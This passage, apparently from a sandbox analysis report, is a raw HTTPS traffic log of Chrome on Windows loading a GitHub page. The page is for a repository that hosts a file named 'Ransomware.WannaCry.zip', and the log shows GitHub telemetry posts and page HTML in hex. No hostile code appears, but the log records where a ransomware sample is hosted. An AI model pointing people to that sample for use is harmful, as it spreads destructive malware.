                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.080202
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91C8:2D7068:2E3C01:763099:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      151192.168.2.1649864140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1117
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC1117OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 70 61 67 65 5f 76 69 65 77 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","page_views":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2
                                                                                      2024-03-23 14:47:31 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.418003
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91CC:1215:22101C:55B0E7:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      152192.168.2.1649869140.82.113.64436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC795OUTPOST /_private/browser/stats HTTP/1.1
                                                                                      Host: api.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 2759
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC2759OUTData Raw: 7b 22 73 74 61 74 73 22 3a 20 5b 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 43 41 4c 4c 45 44 22 2c 22 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 4e 61 6d 65 22 3a 22 74 75 72 62 6f 2d 75 72 6c 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 31 31 32 30 35 32 34 38 37 34 36 2c 22 6c 6f 67 67 65 64 49 6e 22 3a 66 61 6c 73 65 2c 22 73 74 61 66 66 22 3a 66 61 6c 73 65 2c 22 62 75 6e 64 6c 65 72 22 3a 22 77 65 62 70 61 63 6b 22 7d 2c 7b 22 69 6e 63 72 65 6d 65 6e 74 4b 65 79 22 3a 22 54 52 55 53 54 45 44 5f 54 59 50 45 53 5f 50 4f 4c 49 43 59 5f 43 41 4c 4c 45 44 22 2c 22 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 4e 61 6d 65 22 3a 22 74 75 72 62 6f 2d 73 63 72 69 70
                                                                                      Data Ascii: {"stats": [{"incrementKey":"TRUSTED_TYPES_POLICY_CALLED","trustedTypesPolicyName":"turbo-url","timestamp":1711205248746,"loggedIn":false,"staff":false,"bundler":"webpack"},{"incrementKey":"TRUSTED_TYPES_POLICY_CALLED","trustedTypesPolicyName":"turbo-scrip
                                                                                      2024-03-23 14:47:31 UTC1108INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 0
                                                                                      Cache-Control: no-cache
                                                                                      X-RateLimit-Limit: 60
                                                                                      X-RateLimit-Remaining: 60
                                                                                      X-RateLimit-Reset: 1711208851
                                                                                      X-RateLimit-Used: 0
                                                                                      X-RateLimit-Resource: core
                                                                                      X-GitHub-Media-Type: github.v3; format=json
                                                                                      x-github-api-version-selected: 2022-11-28
                                                                                      Access-Control-Expose-Headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Vary: Accept-Encoding, Accept, X-Requested-With
                                                                                      X-GitHub-Request-Id: A77A:243D:28E30FA:47EA98D:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      153192.168.2.1649870140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1586
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC1586OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      2024-03-23 14:47:31 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.090725
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91DC:2E39:2FDFF8:77A5EF:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      154192.168.2.1649871140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:31 UTC877OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:31 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"d974aeea7ff92d286978cb781a4eb98b"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:31 UTC2944INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                      Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 67 69 74 68 75 62 2d 31 39 63 38 35 62 65 34 61 66 39 63 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                      Data Ascii: github-19c85be4af9c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61
                                                                                      Data Ascii: githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githuba
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                                                                                      Data Ascii: er" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" typ
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 66 62 34 62 38 64 34 30 66 32 30 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75
                                                                                      Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modu
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36
                                                                                      Data Ascii: -72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 32 34 34 65 65 39 64 39 65 64 37 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74
                                                                                      Data Ascii: include-467754-244ee9d9ed77.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht
                                                                                      2024-03-23 14:47:31 UTC1370INData Raw: 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 2d 32 65 38 65 37 63 2d 61 35 38 64 37 63 31 31 65 38 35 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 6f 78 5f 42 6f 78 5f 6a 73 2d 38 66 38 63 35 65 32 61 32 63 62 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73
                                                                                      Data Ascii: rimer_react_lib-es-2e8e7c-a58d7c11e858.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js"></script><s


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      155192.168.2.1649860140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:31 UTC886OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1
